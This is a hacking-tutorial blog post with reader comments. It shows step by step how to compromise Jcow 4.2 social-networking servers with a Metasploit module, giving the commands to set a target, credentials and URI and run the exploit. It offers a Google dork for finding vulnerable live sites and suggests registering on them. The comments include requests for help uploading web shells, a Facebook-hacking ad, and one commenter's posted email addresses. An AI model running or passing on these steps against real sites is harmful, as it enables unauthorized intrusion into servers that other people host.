• 8,328
  • 91
  • +474
  • 574
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

Bookmark

Type : Tutorial

Level : Medium

Victim Server : Windows XP SP3

Victim vulnerable application : JCow 4.2

Attacker O.S : Backtrack 5 R1

After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".

So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also :-) ) you can own your web server directory.

In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim :-)

Okay I hope you understand what I say above :-P to make it more realistic, let's try the tutorial…

Requirement :

1. Metasploit framework

2. Jcow.rb exploit

mediafire.com

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution :

1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..

If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).

2. Open your Metasploit console and then use the exploit you just added before.

msf > use exploit/remote/jcow

3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here
uri => jcow

Information :

Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.

4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

PWNED! :-)

Countermeasures :

1. Update your Jcow Social Networking into > v4.2

Hope you enjoyed…any question?just drop it below.. :-)

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

19 Responsesto “4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution”

  1. YEHG says:

    Nice tutorial!
    Thanks for featuring our exploit.
    http://www.exploit-db.com/exploits/17722/

  2. Varius says:

    Cool. But how to upload some shell to the server? Didn't understand. Can help me, please?

  3. Varius says:

    Thanks for you reply! I''l read that tutorial mindfully. I'm not a hacker, just using this script on my site, One more question: this line 'Uploading the payload: /files/asgRk2.php' so, if I want to upload some shell into my site, using this exploit, for example, gnyshell.php, what command in metasploit should I use? Thanks in advance

  4. Varius says:

    Good day! May I ask you one more question? What payload in metasploit should I use to start meterpreter? What steps do I miss? Because exploit connects to vulnerable script, than this message occurs "Exploit completed, but no session was created."

  5. Varius says:

    Thanks a lot! A very usefull info I found in this site! Y've helped me very much

  6. kyle91 says:

     
     
    If someone is interested here can learn about facebook hacking, potecting 
    facebook account, facebook security, hacking tutorials for begginers and something about facebook games. 
    if you are not interested in this skip the comment and sorry for disturbing. 
    http://hack-the-facebook.blogspot.com/

  7. jjordan says:

    Dear Sir, I want your 1 help…please help me…I really in a problem…I want jcow professonal v7 plus [Full Version] free downloadable link….plz give me the link…Its my dream to start a social networking site..I am come from very poor family…plz help me plz….waiting for ur help….

  8. Hi there I am so grateful I found your web site, I really found
    you by accident, while I was researching on Bing for something else, Regardless I am here now and
    would just like to say thanks a lot for a marvelous post and a all round thrilling blog (I also love the theme/design), I don’t have time to go through it all at the minute but I
    have bookmarked it and also added in your RSS feeds, so when
    I have time I will be back to read a lot more, Please
    do keep up the great work.

  9. Elena says:

    I seriously love your blog.. Excellent colors & theme.

    Did you make this website yourself? Please reply back as I’m trying to create my own personal blog and want to know where you got this from or exactly what the theme is named. Cheers!

  10. Hello! Would you mind if I share your blog with my zynga group?
    There’s a lot of people that I think would really enjoy your content. Please let me know. Thanks

  11. Richard says:

    I’ve read so many blogs and
    articles that these hacker’s can ruin someone’s life. Damn! I never believe on
    that. Who do you think you are a genius??? They said that you can actually
    access anyone’s bank account and rip them off through email hacking and even
    can lose a job because of hackers! Are you all crazy??? I have a stable job and
    nobody can make me lose my job! I have a good position and every company needs me! I have a strong security on any bank account. So I dare all the so called genius hackers there!

    1st – make me lose my job and make
    me jobless forever

    2nd – access my bank account and
    rip me off

    3rd – ruin my life and my reputation

    I will wait, I will not give you too much info about myself just my email adds. Let’s see how good all of you!

    richard_rotzler@yahoo.com

    foggycobraspeed@gmail.com

    waiting for you all losers!

Trackbacks/Pingbacks

  1. Hacking Jcow Social Networking Webserver - [...] Kebutuhan : 1. Metasploit Framework (metasploit.com) 2. Script exploit jcow.rb (link mediafire di website asalnya) [...]
  2. Hacking Jcow Social Networking Webserver « Belajar Bersama Ovhan - [...] Kebutuhan : 1. Metasploit Framework (metasploit.com) 2. Script exploit jcow.rb (link mediafire di website asalnya) [...]

Leave a Reply

Your email address will not be published. Required fields are marked *